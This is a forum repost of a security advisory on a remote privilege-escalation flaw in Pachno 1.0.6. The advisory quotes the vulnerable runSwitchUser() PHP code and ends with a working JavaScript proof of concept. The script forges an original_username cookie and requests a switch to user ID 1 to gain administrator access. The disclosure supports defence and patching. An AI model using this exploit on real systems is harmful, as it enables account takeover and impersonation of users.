Стани премиум член и добиј попуст на 2000+ производи и куп други бенефити!
  • Ако имаш проблем со најава или регистрација на IT.mk, побарај го решението тука!

Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
1.091
660
www.zeroscience.mk
Код:
Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation


Vendor: Daniel André Eikeland
Product web page: https://github.com/pachno/pachno
Affected version: 1.0.6

Summary: Pachno is an open-source collaboration platform (formerly known as The Bug
Genie) designed for team project management, issue tracking, and documentation. It
offers a module-based, customizable environment for software development and team
workflows, distributed under the Mozilla Public License.

Desc: The authorization check in the runSwitchUser() action evaluates the expression
!canSaveConfiguration() && !hasCookie('original_username') and only forbids the request
when both subexpressions are true. The presence of the original_username cookie is
sufficient to satisfy the second condition, and that cookie is fully client-controlled.
An authenticated low-privilege user who sets original_username to any value and then
issues a request to switch to user ID 1 receives a fresh session token (token authentication)
or password hash cookie (password authentication) belonging to the target user. This
can be exploited to elevate privileges to administrator and impersonate arbitrary user
accounts.

=====================================================================================
/core/modules/auth/controllers/Authentication.php:
--------------------------------------------------
        /**
         * Switch user action
         *
         * @Route(name="switch_to_user", url="/userswitch/switch/:user_id/:csrf_token")
         * @CsrfProtected
         *
         * @param framework\Request $request
         */
        public function runSwitchUser(framework\Request $request)
        {
            if (!$this->getUser()->canSaveConfiguration() && !$request->hasCookie('original_username'))
                return $this->forward403();

            $response = $this->getResponse();
            $authentication_backend = framework\Settings::getAuthenticationBackend();
            if ($request['user_id']) {
                $user = new entities\User($request['user_id']);
                if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
                    $response->setCookie('original_username', $request->getCookie('username'));
                    $response->setCookie('original_session_token', $request->getCookie('session_token'));
                    framework\Context::getResponse()->setCookie('username', $user->getUsername());
                    framework\Context::getResponse()->setCookie('session_token', $user->createUserSession()->getToken());
                } else {
                    $response->setCookie('original_username', $request->getCookie('username'));
                    $response->setCookie('original_password', $request->getCookie('password'));
                    framework\Context::getResponse()->setCookie('password', $user->getHashPassword());
                    framework\Context::getResponse()->setCookie('username', $user->getUsername());
                }
            } else {
                if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
                    $response->setCookie('username', $request->getCookie('original_username'));
                    $response->setCookie('session_token', $request->getCookie('original_session_token'));
                    framework\Context::getResponse()->deleteCookie('original_session_token');
                    framework\Context::getResponse()->deleteCookie('original_username');
                } else {
                    $response->setCookie('username', $request->getCookie('original_username'));
                    $response->setCookie('password', $request->getCookie('original_password'));
                    framework\Context::getResponse()->deleteCookie('original_password');
                    framework\Context::getResponse()->deleteCookie('original_username');
                }
            }
            $this->forward($this->getRouting()->generate('home'));
        }
=====================================================================================

Tested on: GNU/Linux
           Apache2
           PHP/7.4
           MySQL/5.7 (MariaDB)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2026-5985
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5985


06.04.2026

--


document.cookie = "original_username=liquidworm; path=/";

const csrf = document.querySelector('input[name="csrf_token"]')?.value
          || document.querySelector('meta[name="csrf-token"]')?.content;

fetch('/switch_user', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded',
               'User-Agent'  : 'AuthorizationBypassium/1.12.04' },
    body: `user_id=1&csrf_token=${encodeURIComponent(csrf)}`
}).then(() => {
    window.location.href = '/configure';
});
// If you 'see' /configure, you are admin.



 

Последни теми

Последни огласи

ит маркет

На врв Дно